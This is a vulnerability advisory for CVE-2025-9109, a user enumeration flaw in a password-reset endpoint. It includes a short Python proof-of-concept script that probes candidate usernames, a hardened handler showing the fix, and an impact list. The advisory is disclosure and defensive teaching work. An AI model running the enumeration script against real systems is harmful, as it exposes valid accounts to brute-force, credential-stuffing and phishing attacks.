CVE-2025-9109

Broken Access Control (User Enumeration)

CVE-2025-9109: User Enumeration vulnerability was identified in the Forgot Password functionality

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-9109

Summary

A User Enumeration vulnerability was identified in the Forgot Password functionality. The system responds differently depending on whether the submitted username exists, allowing an attacker to enumerate valid user accounts. This may assist in targeted brute-force attacks or social engineering campaigns.

Details

When submitting a POST request to the endpoint /password/email, the system returns different responses based on whether the provided login parameter corresponds to an existing user.

For example:

  • If the user exists: the response contains a message such as "A password reset link has been sent".
  • If the user does not exist: the response contains a message like "We couldn't find a user with that login".

This behavior allows an attacker to determine which usernames are valid simply by automating requests with different inputs. The vulnerability arises from the lack of a uniform response for valid and invalid accounts during the password recovery process.

PoC

A Python script was created to demonstrate this issue:

    import requests

    # Target endpoint and request headers (the host is redacted in the original).
    url = "http://x.x.x.x/password/email"
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": "http://x.x.x.x",
        "Referer": "http://x.x.x.x/password/reset"
    }
    # Candidate usernames to check.
    logins = ["admin", "jose", "maria", "professor", "aluno1"]

    for login in logins:
        response = requests.post(url, data={"login": login}, headers=headers)
        # The application's messages are in Portuguese: "enviado" ("sent") means
        # the login exists, "não encontramos" ("we couldn't find") means it does not.
        if "enviado" in response.text.lower():
            print(f"[+] {login} -> EXISTE")
        elif "não encontramos" in response.text.lower():
            print(f"[-] {login} -> NÃO EXISTE")

This script was able to confirm which users are registered in the system based on the content of the system's response.
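The fix is to make the forgot-password response independent of whether the login exists. The following is an added example, not code from the advisory or from the affected application: a minimal model of the /password/email handler in the leaky shape the advisory describes, beside a hardened version that returns the same status and body for known and unknown logins. The USERS store, the send callback and the neutral message text are assumptions.

```python
import hashlib
import secrets

# Constructed sample user store: login -> e-mail address (not real data).
USERS = {"admin": "admin@example.invalid", "maria": "maria@example.invalid"}

# Messages quoted in the advisory.
MSG_SENT = "A password reset link has been sent"
MSG_NOT_FOUND = "We couldn't find a user with that login"
# Assumed neutral message that does not reveal whether the login exists.
MSG_UNIFORM = "If an account with that login exists, a password reset link has been sent"


def vulnerable_forgot_password(login, users=USERS, send=lambda addr, tok: None):
    """Behaviour described in the advisory: status and body leak account existence."""
    if login in users:
        token = secrets.token_urlsafe(32)
        send(users[login], token)
        return 200, MSG_SENT
    return 404, MSG_NOT_FOUND


def hardened_forgot_password(login, users=USERS, send=lambda addr, tok: None):
    """Same status code and body whether or not the login exists.

    The token is generated and hashed on every request, so the server-side work is
    the same in both branches; the only branch-dependent step is sending the mail,
    which in a real deployment should be queued asynchronously so that its latency
    cannot be observed in the HTTP response either.
    """
    token = secrets.token_urlsafe(32)
    token_hash = hashlib.sha256(token.encode()).hexdigest()  # what would be stored
    email = users.get(login)
    if email is not None:
        send(email, token)
    return 200, MSG_UNIFORM


def responses_distinguishable(handler, known_login, unknown_login):
    """True if an observer could tell a valid login from an invalid one by the reply."""
    return handler(known_login) != handler(unknown_login)
```

Pair the uniform response with per-IP and per-login rate limiting on the endpoint, since a neutral message alone does not stop automated guessing.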

Impact

• Exposure of valid accounts: Attackers can confirm which users are registered in the system.
• Facilitates brute-force attacks: Valid users can be targeted by automated password-guessing attempts.
• Credential stuffing: Discovered accounts can be tested with passwords leaked from other services.
• Targeted phishing: Attackers can send socially engineered emails to confirmed users, increasing the success rate of scams.
• Loss of privacy: Simply confirming the existence of a user can expose sensitive data in certain contexts (e.g., accounts on restricted or confidential services).
• Attack escalation: User enumeration can serve as an initial step in exploiting more serious vulnerabilities, such as account takeovers.
• Reputational damage: The perception of basic security flaws can affect the credibility of the application with users and customers.

Reference

https://vuldb.com/?submit.627926

Finder

Vanderlei Princival

By: CVE-Hunters
